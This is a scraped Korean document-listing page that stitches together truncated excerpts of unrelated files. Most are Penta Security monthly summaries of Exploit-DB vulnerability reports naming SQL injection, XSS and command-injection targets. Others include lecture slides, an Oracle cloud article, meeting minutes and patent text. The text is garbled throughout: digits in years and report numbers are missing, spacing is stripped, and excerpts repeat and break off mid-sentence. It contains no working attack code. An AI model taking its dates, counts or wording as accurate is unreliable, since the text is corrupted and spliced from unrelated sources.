36802 Tune Library / 중 NEX-Forms < admin-ajax.php 하 중 Ultimate Product Catalogue - / 하 중 Ultimate Product Catalogue - ad 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (205.04) 205.04.0~205.04.30 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 205 년 4 월에공개된 Exploit-DB 의분석결과, 공격에대한보고개수가가장많았습니다. 대부분의 공격이 CMS 에서발견되습니다. CMS 에서는

More information

EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된별로분류한정보입니다 SQL Injection 하 상 u5cms localize.php SQL U5cms 3607 SQL

EDB 분석보고서 (05.0) ~ Exploit-DB(  에공개된별로분류한정보입니다 SQL Injection 하 상 u5cms localize.php SQL U5cms 3607 SQL EDB 분석보고서 (05.0) 05.0.0~05.0.8 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 05 년 월에공개된 Exploit-DB 의분석결과, 지난 월의분석결과와동일하게 SQL Injection 과 Coss Site Scipting(XSS) 공격에대한보고개수가가장많았습니다.

More information

EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 중상 Absolu

EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB(  에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 중상 Absolu EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 0 년 월에공개된 Exploit-DB 의분석결과, 잘알려진웹공격인 SQL Injection 과 XSS(Cross Site Scripting) 공격에대한보고가가장많았습니다.

More information

EDB 분석보고서 (04.09) ~ Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다 SQL Injection Like Dislike Counter..3 Plugin - ajax_coun

EDB 분석보고서 (04.09) ~ Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다 SQL Injection Like Dislike Counter..3 Plugin - ajax_coun EDB 분석보고서 (04.09) 04.09.0~04.09.30 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04 년 09 월에공개된 Exploit-DB 의분석결과, Cross Site Scripting 공격에대한취약점보고개수가가장많았습니다. 분석된 Cross

More information

날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 Directory Traversal 하 EDB 분석보고서 (05.0) ~ Exploit-DB(http://exploit-db.com) 에공개된취약

날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 Directory Traversal 하 EDB 분석보고서 (05.0) ~ Exploit-DB(http://exploit-db.com) 에공개된취약 EDB 분석보고서 (05.0) 05.0.0~05.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 05 년 0 월에공개된 Exploit-DB 의분석결과, SQL Injection 공격에대한취약점보고개수가다른취약점과비교하여유난히많았습니다. 세계적으로가장많이사용되고있는

More information

POST /process.php HTTP/ XSS 중중 Command Injection 상상 EPESI.8.2 rev XSS ClipBucket Remote Code Execution

POST /process.php HTTP/ XSS 중중 Command Injection 상상 EPESI.8.2 rev XSS ClipBucket Remote Code Execution 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 207 년 0 월 Exploit-DB 에공개된은총 67 개입니다. 그중 SQL Injection 공격은총 5 개로가장많은수를차지했습니다. 이달의위험도가가장높은공격은 Command Injection 공격이었습니다. Command Injection 공격은의도하지않은시스템명령어를실행시킬수있는공격으로, 이번달공개된공격은주로

More information

EDB 분석보고서 (06.0) ~ Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다 PHP Imagick / command injection 취약점 /image.j

EDB 분석보고서 (06.0) ~ Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다 PHP Imagick / command injection 취약점 /image.j EDB 분석보고서 (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 06 년 월에공개된 Exploit-DB 의분석결과, Cross Site Scripting 공격에대한취약점보고개수가가장많았습니다. Cross Site Scripting

More information

EDB 분석보고서 (05.08) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 7/08/ File Upload 하중.

EDB 분석보고서 (05.08) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 7/08/ File Upload 하중. EDB 분석보고서 (05.08) 05.08.0~05.08. Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 05 년 8 월에공개된 Exploit-DB 의분석결과, 공격에대한보고개수가가장많았습니다. 분석된 공격들은주로특정웹어플리케이션의구조적인특성상발생하는들이거나구현이쉬운공격들이대부분이었습니다.

More information

3장

3장 C H A P T E R 03 CHAPTER 03 03-01 03-01-01 Win m1 f1 e4 e5 e6 o8 Mac m1 f1 s1.2 o8 Linux m1 f1 k3 o8 AJAX

More information

오늘날의 기업들은 24시간 365일 멈추지 않고 돌아간다. 그리고 이러한 기업들을 위해서 업무와 관련 된 중요한 문서들은 언제 어디서라도 항상 접근하여 활용이 가능해야 한다. 끊임없이 변화하는 기업들 의 경쟁 속에서 기업내의 중요 문서의 효율적인 관리와 활용 방안은 이

오늘날의 기업들은 24시간 365일 멈추지 않고 돌아간다. 그리고 이러한 기업들을 위해서 업무와 관련 된 중요한 문서들은 언제 어디서라도 항상 접근하여 활용이 가능해야 한다. 끊임없이 변화하는 기업들 의 경쟁 속에서 기업내의 중요 문서의 효율적인 관리와 활용 방안은 이 C Cover Story 05 Simple. Secure. Everywhere. 문서관리 혁신의 출발점, Oracle Documents Cloud Service 최근 문서 관리 시스템의 경우 커다란 비용 투자 없이 효율적으로 문서를 관리하기 위한 기업들의 요구는 지속적으로 증가하고 있다. 이를 위해, 기업 컨텐츠 관리 솔루션 부분을 선도하는 오라클은 문서관리

More information

Secure Programming Lecture1 : Introduction

Secure Programming Lecture1 : Introduction Malware and Vulnerability Analysis Lecture4-1 Vulnerability Analysis #4-1 Agenda 웹취약점점검 웹사이트취약점점검 HTTP and Web Vulnerability HTTP Protocol 웹브라우저와웹서버사이에하이퍼텍스트 (Hyper Text) 문서송수신하는데사용하는프로토콜 Default Port

More information

EDB 분석보고서 (06.0) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 /picosafe_webgui/webint

EDB 분석보고서 (06.0) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 /picosafe_webgui/webint EDB 분석보고서 (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 06 년 0 월에공개된 Exploit-DB 의분석결과, SQL Injection 공격에대한보고개수가가장많았으며공격유형도다양하게발견되었습니다. SQL Injection

More information

제목 레이아웃

제목 레이아웃 웹해킹이라고무시하는것들보소 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM SQL Injection 끝나지않은위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM Who am I 정도원 aka rubiya Penetration tester Web application bughuter Pwned 20+ wargame @kr_rubiya

More information

(주)나우프로필의 이동형 대표 개편의 방향이 시민참여를 많이 하는 방향이라, 홈페이지 시안 이 매우 간편해져서 소통이 쉬워질 것 같다. 다만 웹보다 모바일 이용자가 지속적으로 급증하는 추세이므로 이에 적합한 구조가 되도록 보장해야 한다. 소셜미디어전략연구소 배운철 대표

(주)나우프로필의 이동형 대표 개편의 방향이 시민참여를 많이 하는 방향이라, 홈페이지 시안 이 매우 간편해져서 소통이 쉬워질 것 같다. 다만 웹보다 모바일 이용자가 지속적으로 급증하는 추세이므로 이에 적합한 구조가 되도록 보장해야 한다. 소셜미디어전략연구소 배운철 대표 홈페이지 정비 및 향후 추진방향 자문회의 회의록 일 시 : 2012. 1. 16(월) 14:00 ~ 16:00 장 소 : 1동 3층 스마트정보지원센터 참석자 : 내 외부 자문위원(10명), 관련부서 직원(10명), 정보화기획단장, 정보화기획담당관, 관련팀장, 직원 등 정보화기획단에서는 12. 1. 16(월)에 1동 3층 스마트정보지원센터에서 시정 홈페이지 통

More information

ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O

ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O Orange for ORACLE V4.0 Installation Guide ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE...1 1....2 1.1...2 1.2...2 1.2.1...2 1.2.2 (Online Upgrade)...11 1.3 ORANGE CONFIGURATION ADMIN...12 1.3.1 Orange Configuration

More information

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D313939392D382E687770>

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D313939392D382E687770> i ii iii iv v vi 1 2 3 4 가상대학 시스템의 국내외 현황 조사 가상대학 플랫폼 개발 이상적인 가상대학시스템의 미래상 제안 5 웹-기반 가상대학 시스템 전통적인 교수 방법 시간/공간 제약을 극복한 학습동기 부여 교수의 일방적인 내용전달 교수와 학생간의 상호작용 동료 학생들 간의 상호작용 가상대학 운영 공지사항,강의록 자료실, 메모 질의응답,

More information

PCServerMgmt7

PCServerMgmt7 Web Windows NT/2000 Server DP&NM Lab 1 Contents 2 Windows NT Service Provider Management Application Web UI 3 . PC,, Client/Server Network 4 (1),,, PC Mainframe PC Backbone Server TCP/IP DCS PLC Network

More information

08SW

08SW www.mke.go.kr + www.keit.re.kr Part.08 654 662 709 731 753 778 01 654 Korea EvaluationInstitute of industrial Technology IT R&D www.mke.go.kr www.keit.re.kr 02 Ministry of Knowledge Economy 655 Domain-Specific

More information

Orcad Capture 9.x

Orcad Capture 9.x OrCAD Capture Workbook (Ver 10.xx) 0 Capture 1 2 3 Capture for window 4.opj ( OrCAD Project file) Design file Programe link file..dsn (OrCAD Design file) Design file..olb (OrCAD Library file) file..upd

More information

FileMaker 15 WebDirect 설명서

FileMaker 15 WebDirect 설명서 FileMaker 15 WebDirect 2013-2016 FileMaker, Inc.. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker FileMaker Go FileMaker, Inc.. FileMaker WebDirect FileMaker, Inc... FileMaker.

More information

API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum

API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 2012.11.23 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Document Distribution Copy Number Name(Role, Title) Date

More information

vm-웨어-01장

vm-웨어-01장 Chapter 16 21 (Agenda). (Green),., 2010. IT IT. IT 2007 3.1% 2030 11.1%, IT 2007 1.1.% 2030 4.7%, 2020 4 IT. 1 IT, IT. (Virtualization),. 2009 /IT 2010 10 2. 6 2008. 1970 MIT IBM (Mainframe), x86 1. (http

More information

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks XSS s XSS, s, May 25, 2010 XSS s 1 2 s 3 XSS s MySpace 사건. Samy (JS.Spacehero) 프로필 페이지에 자바스크립트 삽입. 스크립트 동작방식 방문자를 친구로 추가. 방문자의 프로필에 자바스크립트를 복사. 1시간 만에 백만 명이 친구등록. s XSS s 위험도가 낮은 xss 취약점을 다른 취약점과 연계하여

More information

Analytics > Log & Crash Search > Unity ios SDK [Deprecated] Log & Crash Unity ios SDK. TOAST SDK. Log & Crash Unity SDK Log & Crash Search. Log & Cras

Analytics > Log & Crash Search > Unity ios SDK [Deprecated] Log & Crash Unity ios SDK. TOAST SDK. Log & Crash Unity SDK Log & Crash Search. Log & Cras Analytics > Log & Crash Search > Unity ios SDK [Deprecated] Log & Crash Unity ios SDK. TOAST SDK. Log & Crash Unity SDK Log & Crash Search. Log & Crash Unity SDK... Log & Crash Search. - Unity3D v4.0 ios

More information

6강.hwp

6강.hwp ----------------6강 정보통신과 인터넷(1)------------- **주요 키워드 ** (1) 인터넷 서비스 (2) 도메인네임, IP 주소 (3) 인터넷 익스플로러 (4) 정보검색 (5) 인터넷 용어 (1) 인터넷 서비스******************************* [08/4][08/2] 1. 다음 중 인터넷 서비스에 대한 설명으로

More information

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc 분석보고서 이동현 (dhclub20@naver.com) SK Infosec Co., Inc MSS 사업본부침해대응팀모의해킹파트 Table of Contents 1. 개요... 3 1.1. 배경... 3 1.2. 목적... 3 2. 공격분석... 4 2.1. Cookie Injection... 4 2.2. Cookie Injection의발생원인... 5 2.3.

More information

DocsPin_Korean.pages

DocsPin_Korean.pages Unity Localize Script Service, Page 1 Unity Localize Script Service Introduction Application Game. Unity. Google Drive Unity.. Application Game. -? ( ) -? -?.. 준비사항 Google Drive. Google Drive.,.. - Google

More information

<4D6963726F736F667420506F776572506F696E74202D2030342E20C0CEC5CDB3DD20C0C0BFEB20B9D720BCADBAF1BDBA20B1E2BCFA2831292E70707478>

<4D6963726F736F667420506F776572506F696E74202D2030342E20C0CEC5CDB3DD20C0C0BFEB20B9D720BCADBAF1BDBA20B1E2BCFA2831292E70707478> 웹과 인터넷 활용 및실습 () (Part I) 문양세 강원대학교 IT대학 컴퓨터과학전공 강의 내용 전자우편(e-mail) 인스턴트 메신저(instant messenger) FTP (file transfer protocol) WWW (world wide web) 인터넷 검색 홈네트워크 (home network) Web 2.0 개인 미니홈페이지 블로그 (blog)

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 SECUINSIDE 2017 Bypassing Web Browser Security Policies DongHyun Kim (hackpupu) Security Researcher at i2sec Korea University Graduate School Agenda - Me? - Abstract - What is HTTP Secure Header? - What

More information

Portal_9iAS.ppt [읽기 전용]

Portal_9iAS.ppt [읽기 전용] Application Server iplatform Oracle9 A P P L I C A T I O N S E R V E R i Oracle9i Application Server e-business Portal Client Database Server e-business Portals B2C, B2B, B2E, WebsiteX B2Me GUI ID B2C

More information

UNIST_교원 홈페이지 관리자_Manual_V1.0

UNIST_교원 홈페이지 관리자_Manual_V1.0 Manual created by metapresso V 1.0 3Fl, Dongin Bldg, 246-3 Nonhyun-dong, Kangnam-gu, Seoul, Korea, 135-889 Tel: (02)518-7770 / Fax: (02)547-7739 / Mail: contact@metabrain.com / http://www.metabrain.com

More information

초보자를 위한 ASP.NET 2.0

초보자를 위한 ASP.NET 2.0 (World Wide Web), HTML., (ebay) (Amazon.com) HTML,., Microsoft ASP.NET. ASP.NET ASP.NET., ASP.NET HTML,,. ASP.NET HTML.. ASP.NET, Microsoft Visual Basic. Visual Basic. 5 Visual Basic, Visual Basic. ASP.NET

More information

?

? 0.09 0.09 0.12 0.12 0.11 0.10 0.07 0.03 0.02 0.06 0.07 0.08 0.03 0.07 0.11 0.13 0.13 0.11 0.02 0.001 0.08 0.15 0.09 0.18 0.30 0.42 0.53 0.63 0.69 0.72 0.75 0.81 0.87 0.96 0.03 0.10 0.21 0.34 0.47 0.58

More information

3708 하 중 Landing Pages Plugin post.php 3708 XSS 하 중 Landing Pages Plugin post-new.php 3707 하 중 NewStatPress Plugin admin.php 3707

3708 하 중 Landing Pages Plugin post.php 3708 XSS 하 중 Landing Pages Plugin post-new.php 3707 하 중 NewStatPress Plugin admin.php 3707 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (205.05) 205.05.0~205.05.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 205 년 5 월에공개된 Exploit-DB 의분석결과, XSS (Cross Site Scripting) 공격에대한보고개수가가장많았습니다. 분석된

More information

untitled

untitled 1-2 1-3 1-4 Internet 1 2 DB Server Learning Management System Web Server (Win2003,IIS) VOD Server (Win2003) WEB Server Broadcasting Server 1-5 1-6 MS Internet Information Server(IIS) Web MS-SQL DB ( )

More information

<4D6963726F736F667420576F7264202D2033BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378>

<4D6963726F736F667420576F7264202D2033BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378> 목차 Part Ⅰ. 2 월의 악성코드 통계 1. 악성코드 통계... 2 (1) 감염 악성코드 Top 15... 2 (2) 카테고리별 악성코드 유형... 3 (3) 카테고리별 악성코드 비율 전월 비교... 3 (4) 월별 피해 신고 추이... 4 (5) 월별 악성코드 DB 등록 추이... 4 2. 악성코드 이슈 분석 악성코드 종합 선물셋트 Bredolab Worm...

More information

Remote UI Guide

Remote UI Guide Remote UI KOR Remote UI Remote UI PDF Adobe Reader/Adobe Acrobat Reader. Adobe Reader/Adobe Acrobat Reader Adobe Systems Incorporated.. Canon. Remote UI GIF Adobe Systems Incorporated Photoshop. ..........................................................

More information

HTML5가 웹 환경에 미치는 영향 고 있어 웹 플랫폼 환경과는 차이가 있다. HTML5는 기존 HTML 기반 웹 브라우저와의 호환성을 유지하면서도, 구조적인 마크업(mark-up) 및 편리한 웹 폼(web form) 기능을 제공하고, 리치웹 애플리케이 션(RIA)을

HTML5가 웹 환경에 미치는 영향 고 있어 웹 플랫폼 환경과는 차이가 있다. HTML5는 기존 HTML 기반 웹 브라우저와의 호환성을 유지하면서도, 구조적인 마크업(mark-up) 및 편리한 웹 폼(web form) 기능을 제공하고, 리치웹 애플리케이 션(RIA)을 동 향 제 23 권 5호 통권 504호 HTML5가 웹 환경에 미치는 영향 이 은 민 * 16) 1. 개 요 구글(Google)은 2010년 5월 구글 I/O 개발자 컨퍼런스에서 HTML5를 통해 플러 그인의 사용이 줄어들고 프로그램 다운로드 및 설치가 필요 없는 브라우저 기반 웹 플랫폼 환경이 점차 구현되고 있다고 강조했다. 그리고 애플(Apple)은 2010년

More information

본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게 해 주는 프로그램입니다. 다양한 기능을 하는 플러그인과 디자인

본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게 해 주는 프로그램입니다. 다양한 기능을 하는 플러그인과 디자인 스마일서브 CLOUD_Virtual 워드프레스 설치 (WORDPRESS INSTALL) 스마일서브 가상화사업본부 Update. 2012. 09. 04. 본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게

More information

Data Industry White Paper

Data Industry White Paper 2017 2017 Data Industry White Paper 2017 1 3 1 2 3 Interview 1 ICT 1 Recommendation System * 98 2017 Artificial 3 Neural NetworkArtificial IntelligenceAI 2 AlphaGo 1 33 Search Algorithm Deep Learning IBM

More information

105È£4fš

105È£4fš 의 자선단체들이 사랑과 자비를 베푼 덕택에 국제 사회에서 훠모사가 존경받는 위치에 섰으며 국가간 에 상호우애를 다지는 데 큰 기여를 했다고 치하했 다. 칭하이 무상사 국제협회는 구호물자를 터키 지 터키 지진 피해자들을 위한 구호물자 전달식 진 피해자들에게 전달하는데 협조해 준 중국 항공의 훠모사 항공화물 센터 매니저인 제임스 류 씨, 골든 파운데이션 여행사의

More information

품질검증분야 Stack 통합 Test 결과보고서 [ The Bug Genie ]

품질검증분야 Stack 통합 Test 결과보고서 [ The Bug Genie ] 품질검증분야 Stack 통합 Test 결과보고서 [ The Bug Genie ] 2014. 10. 목 차 I. Stack 통합테스트개요 1 1. 목적 1 II. 테스트대상소개 2 1. The Bug Genie 소개 2 2. The Bug Genie 주요기능 3 3. The Bug Genie 시스템요구사항및주의사항 5 III. Stack 통합테스트 7 1. 테스트환경

More information

Interstage5 SOAP서비스 설정 가이드

Interstage5 SOAP서비스 설정 가이드 Interstage 5 Application Server ( Solaris ) SOAP Service Internet Sample Test SOAP Server Application SOAP Client Application CORBA/SOAP Server Gateway CORBA/SOAP Gateway Client INTERSTAGE SOAP Service

More information

특허청구의 범위 청구항 1 디바이스가 어플리케이션을 실행하는 방법에 있어서, 상기 디바이스에 연결된 제1 외부 디바이스와 함께 상기 어플리케이션을 실행하는 단계; 상기 어플리케이션의 실행 중에 제2 외부 디바이스를 통신 연결하는 단계; 및 상기 제1 외부 디바이스 및

특허청구의 범위 청구항 1 디바이스가 어플리케이션을 실행하는 방법에 있어서, 상기 디바이스에 연결된 제1 외부 디바이스와 함께 상기 어플리케이션을 실행하는 단계; 상기 어플리케이션의 실행 중에 제2 외부 디바이스를 통신 연결하는 단계; 및 상기 제1 외부 디바이스 및 (19) 대한민국특허청(KR) (12) 공개특허공보(A) (11) 공개번호 10-2014-0033653 (43) 공개일자 2014년03월19일 (51) 국제특허분류(Int. Cl.) G06F 9/44 (2006.01) G06F 15/16 (2006.01) (21) 출원번호 10-2012-0099738 (22) 출원일자 2012년09월10일 심사청구일자 없음

More information

특허청구의 범위 청구항 1 몸체(110)의 일측에는 테스트의 필요성에 따라 여타한 디젤 자동차(100)에서 분리시킨 상태의 분리형 커먼레일 인젝트(110)를 고정할 수 있는 분리형 인젝터 고정부(20)가 구비되고, 그 고정부(20)의 하측에는 분리형 커먼 레일 인젝터(

특허청구의 범위 청구항 1 몸체(110)의 일측에는 테스트의 필요성에 따라 여타한 디젤 자동차(100)에서 분리시킨 상태의 분리형 커먼레일 인젝트(110)를 고정할 수 있는 분리형 인젝터 고정부(20)가 구비되고, 그 고정부(20)의 하측에는 분리형 커먼 레일 인젝터( (19) 대한민국특허청(KR) (12) 공개특허공보(A) (11) 공개번호 10-2010-0038259 (43) 공개일자 2010년04월14일 (51) Int. Cl. G01M 15/09 (2006.01) G01M 15/00 (2006.01) (21) 출원번호 10-2008-0097443 (22) 출원일자 2008년10월04일 심사청구일자 전체 청구항 수 :

More information

Oracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용

Oracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용 Oracle hacking 작성자 : 임동현 (ddongsbrk@naver.com) 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용 Skill List 1. Oracle For Pentest 1. Find TNS Listener (Default 1521 port) (with nmap or amap) 2. Get the

More information

thesis

thesis ( Design and Implementation of a Generalized Management Information Repository Service for Network and System Management ) ssp@nile nile.postech.ac..ac.kr DPE Lab. 1997 12 16 GMIRS GMIRS GMIRS prototype

More information

목 차 Ⅰ. 일반사항 1 Ⅱ. 특기사항 3 Ⅲ. 물품내역 및 세부규격 8 Ⅳ. 주의사항 11-2 -

목 차 Ⅰ. 일반사항 1 Ⅱ. 특기사항 3 Ⅲ. 물품내역 및 세부규격 8 Ⅳ. 주의사항 11-2 - 대전마케팅공사 경영정보포털 구축 사업 패키지 소프트웨어 2식 구매 설치 시방서 (소프트웨어 2식) 2016. 06. 대전마케팅공사 경 영 지 원 파 트 목 차 Ⅰ. 일반사항 1 Ⅱ. 특기사항 3 Ⅲ. 물품내역 및 세부규격 8 Ⅳ. 주의사항 11-2 - Ⅰ. 일반사항 1. 목적 본 시방서는 대전마케팅공사가 추진하고 있는 경영정보포털 사업의 패키지 소프트웨어 도입을

More information

12¿ù 1~30

12¿ù 1~30 12월 31-49 2010.12.17 2:4 PM 페이지37 집중조명 집중조명 해외 초고층 오피스빌딩의 층별효용격차 사례분석 - 홍콩 일본 초고층 오피스빌딩 층별 임대료 조사내용을 중심으로 김 영 혁 전임연구원 한국감정원 부동산연구원 도시환경연구부 36 + 37 Real Estate Focus December 38+ 39 Real Estate Focus December

More information

PowerPoint

PowerPoint .. http://www.acs.co.kr -1- .. http://www.acs.co.kr -3- ( Advanced Computer Services Co.,Ltd. ) 345-9 SK B8 ( sh_kim@acs.co.kr ) 116-81-24039 http://www.acs.co.kr, http://www.emanufacturing.co.kr (Fax)

More information

제 호 년 제67차 정기이사회, 고문 자문위원 추대 총동창회 집행부 임원 이사에게 임명장 수여 월 일(일) 년 월 일(일) 제 역대 최고액 모교 위해 더 확충해야 강조 고 문:고달익( 1) 김병찬( 1) 김지훈( 1) 강보성( 2) 홍경식( 2) 현임종( 3) 김한주( 4) 부삼환( 5) 양후림( 5) 문종채( 6) 김봉오( 7) 신상순( 8) 강근수(10)

More information

chapter1,2.doc

chapter1,2.doc JavaServer Pages Version 08-alpha copyright2001 B l u e N o t e all rights reserved http://jspboolpaecom vesion08-alpha, UML (?) part1part2 Part1 part2 part1 JSP Chapter2 ( ) Part 1 chapter 1 JavaServer

More information

ODS-FM1

ODS-FM1 OPTICAL DISC ARCHIVE FILE MANAGER ODS-FM1 INSTALLATION GUIDE [Korean] 1st Edition (Revised 4) 상표 Microsoft, Windows 및 Internet Explorer는 미국 및 / 또는 다른 국가에서 Microsoft Corporation 의 등록 상표입 Intel 및 Intel Core

More information

歯sql_tuning2

歯sql_tuning2 SQL Tuning (2) SQL SQL SQL Tuning ROW(1) ROW(2) ROW(n) update ROW(2) at time 1 & Uncommitted update ROW(2) at time 2 SQLDBA> @ UTLLOCKT WAITING_SESSION TYPE MODE_REQUESTED MODE_HELD LOCK_ID1

More information

cam_IG.book

cam_IG.book 설치 안내서 AXIS P3301 고정형 돔 네트워크 카메라 AXIS P3301-V 고정형 돔 네트워크 카메라 한국어 AXIS P3304 고정형 돔 네트워크 카메라 AXIS P3304-V 고정형 돔 네트워크 카메라 문서 정보 본 문서에는 사용자 네트워크에 AXIS P3301/P3304 고정형 돔 네트워크 카메라를 설치하는 방법에 대 한 지침이 포함되어 있습니다.

More information

BH의 아이폰 추천 어플

BH의 아이폰 추천 어플 BH의 아이폰 추천 어플 정병훈 소개글 목차 1 [BH의 아이폰 필수 앱] Pulse - 뉴스/웹사이트/RSS 모아주는 앱 4 2 [BH의 아이폰 필수 앱] Dropbox - n스크린 파일 공유 앱 (문서, 사진, 동영상 등) 12 3 [BH의 아이폰 필수 앱] 파노라마 사진찍기 Photosynth 17 4 [BH의 아이폰 필수 앱] 연락처 동기화 네이버 주소록

More information

untitled

untitled Push... 2 Push... 4 Push... 5 Push... 13 Push... 15 1 FORCS Co., LTD A Leader of Enterprise e-business Solution Push (Daemon ), Push Push Observer. Push., Observer. Session. Thread Thread. Observer ID.

More information

VOL.76.2008/2 Technical SmartPlant Materials - Document Management SmartPlant Materials에서 기본적인 Document를 관리하고자 할 때 필요한 세팅, 파일 업로드 방법 그리고 Path Type인 Ph

VOL.76.2008/2 Technical SmartPlant Materials - Document Management SmartPlant Materials에서 기본적인 Document를 관리하고자 할 때 필요한 세팅, 파일 업로드 방법 그리고 Path Type인 Ph 인터그래프코리아(주)뉴스레터 통권 제76회 비매품 News Letters Information Systems for the plant Lifecycle Proccess Power & Marine Intergraph 2008 Contents Intergraph 2008 SmartPlant Materials Customer Status 인터그래프(주) 파트너사

More information

Sena Device Server Serial/IP TM Version

Sena Device Server Serial/IP TM Version Sena Device Server Serial/IP TM Version 1.0.0 2005. 3. 7. Release Note Revision Date Name Description V1.0.0 2005-03-7 HJ Jeon Serial/IP 4.3.2 ( ) 210 137-130, : (02) 573-5422 : (02) 573-7710 email: support@sena.com

More information

<4D6963726F736F667420576F7264202D205B4354BDC9C3FEB8AEC6F7C6AE5D3131C8A35FC5ACB6F3BFECB5E520C4C4C7BBC6C320B1E2BCFA20B5BFC7E2>

<4D6963726F736F667420576F7264202D205B4354BDC9C3FEB8AEC6F7C6AE5D3131C8A35FC5ACB6F3BFECB5E520C4C4C7BBC6C320B1E2BCFA20B5BFC7E2> 목차(Table of Content) 1. 클라우드 컴퓨팅 서비스 개요... 2 1.1 클라우드 컴퓨팅의 정의... 2 1.2 미래 핵심 IT 서비스로 주목받는 클라우드 컴퓨팅... 3 (1) 기업 내 협업 환경 구축 및 비용 절감 기대... 3 (2) N-스크린 구현에 따른 클라우드 컴퓨팅 기술 기대 증폭... 4 1.3 퍼스널 클라우드와 미디어 콘텐츠 서비스의

More information

초보자를 위한 ADO 21일 완성

